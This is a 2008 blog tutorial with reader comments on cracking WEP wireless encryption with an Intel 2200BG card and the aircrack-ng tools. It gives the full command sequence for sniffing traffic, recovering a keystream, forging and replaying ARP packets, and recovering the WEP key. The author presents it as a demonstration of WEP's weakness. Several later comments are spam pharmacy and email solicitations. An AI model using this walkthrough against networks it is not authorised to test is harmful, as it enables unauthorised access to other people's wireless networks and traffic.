Cracking WEP using Intel® PRO/Wireless 2200BG
Written by Tshepho Koboyatshwene on September 22, 2008 – 2:12 am -
Configuring the wireless Card
9a. Install the ipw2200 module into the kernel (assuming the network card that you have is an Intel based card) by issuing the following command in the current directory
[rmmod ipw2200] <Enter> #disables the card
[modprobe ipw2200 rtap_iface=1] <Enter> #configure the card to sniff traffic
Note. You will need the MAC address(BSSID) and the name of the wireless Access Point(ESSID) and the Channel number of your target wireless network.
To get these just issue the following commands in the terminal
[airodump eth1]
This will list all the available wireless networks around together with their BSSID, ESSID and Channels as shown in see p6.jpg
9b. Enable the wireless card and configure its wireless settings to those shown in the following command
[ifconfig eth1 up] <Enter>
[iwconfig eth1 essid <ESSID> key s:fakekey mode managed]
where fakekey is any string of your choice.
Time to “Attack”
- Now start collecting wireless traffic on the interface and store the captured packates in a file, I stored mine in dump
[airodump-ng --bssid <BSSID> -w dump rtap0] - Now for the actual injection open a new terminal like you did previously and type in the following command. For the following command, you will need the
MAC address of your network card, you can get it by typing[aireplay-ng -4 -a <BSSID> -h <MAC> -i rtap0 eth1] - A prompt will ask you to use “this” packet. Type “y” and the attack should continue. Once it finishes you will have a plaintext (.cap) file and a keystream(.xor) file.
The keystream file will look something like “replay_dec-######.xor” - When the command is completed, if you get a message that says”Warning : ICV Checksum verification FAILED“, run the previous command again until you get a SUCCESS message(see p9.jpg)
- The previous command will have created a couple of files with names replay_dec-####.xor(.cap) Now we will create an arp-request packet using the acquired keysteam file.
The “-l” and “-k” options are the source IP and destination IP. They can be any valid IP in your network. The destination can be the gateway (router IP) but the attack run faster if it is an arbitrary IP.[packetforge-ng -0 -a <AP MAC> -h <MAC> -k 192.168.1.100 -l 192.168.1.101 -y replay_dec-####.xor -w arp-request]
Now for the break-in
Finally we will send ou newly created arp-request packet over and over. After this step you should see the “Data” begin to rise quickly back in the first terminal (airodump).
If the data doesn’t change (usually between 80 and 350 per second) then something is wrong.(p10.jpg)
[aireplay-ng -2 -r arp-request eth1]
15. Let aireplay run for a few minutes while you collect data. After 75,000(p11.jpg) or so data packaets you can run aircrack in a new terminal.
aircrack-ng -z dump*.cap
This will give you the WEP key in couple of minutes as shown in the figure below :
Given how easy it is to crack WEP security, it is amazing that some people still use it, I just hope you are not one of them.
Tags: bssid, mac address, router, wireless access point, wireless security
Posted in wireless security |
















September 23rd, 2008 at 12:05 pm
it werkz
September 23rd, 2008 at 4:59 pm
Photoshopped. lol
September 23rd, 2008 at 9:08 pm
sadly my router only supports wep
nice guide someone posted it on SU but i already knew how to do this but non the less nice guide 
September 24th, 2008 at 6:39 am
Bob, lol@photoshoped; I had to, otherwise the screenshots will look clumsy [ but i did not photoshop the results though]
“sorry” to hear that Steven, I guess a new router should be in the cards then
Thanks for your comments guys, even “me”; glad that it works for you
October 1st, 2008 at 10:13 pm
I had luck with auditor which I believe is an earlier version of backtrack. I have not tried backtrack but can only image it has more improved features.
October 11th, 2008 at 5:24 am
Hey it is on Linux? or that software looks like that?
October 11th, 2008 at 12:11 pm
Vic, yeah it’s Linux, I was using Backtrack which is Linux distribution with lots of security goodies. You can burn it onto a cd and boot straight from the live disc without having to install it onto the hard drive.
October 12th, 2008 at 6:08 pm
So wouldn’t work on Windows? Any windows version?
October 13th, 2008 at 10:26 pm
OK, so you hacked my WEP wirless G, now what? How do you get to my domain, workgroup or secured shares?
Or does the real desire here assume that most don’t secure their shares? Hell, if that is the case most home users don’t know how to share a folder, period!
April 23rd, 2009 at 6:53 am
U are a genius in the making. But hey, dont you thing you are empowering those who new nothing about this?
June 7th, 2009 at 5:08 am
Hello rsfeller and Joachim, the intention was not to hack into other people’s personnel networks. It was meant to show the flaws or security of WEP.
August 25th, 2009 at 1:28 am
xecomezave…
Horny Spainish Flies …
June 11th, 2010 at 11:40 pm
How are you?! Please e-mail me your contacts. I have a question james@infansport.ru” rel=”nofollow”>……
Best regards….
June 15th, 2010 at 10:36 am
Привет!! carlos@onlylcd.ru” rel=”nofollow”>……
С уважением,…
June 19th, 2010 at 12:35 pm
Добрый вечер! mason@sportbul.ru” rel=”nofollow”>……
С уважением,…
July 21st, 2010 at 8:40 am
Buy:Valtrex.Zovirax.Actos.Accutane.Nexium.Synthroid.Lumigan.Arimidex.Mega Hoodia.Prevacid.Human Growth Hormone.100% Pure Okinawan Coral Calcium.Retin-A.Zyban.Petcam (Metacam) Oral Suspension.Prednisolone….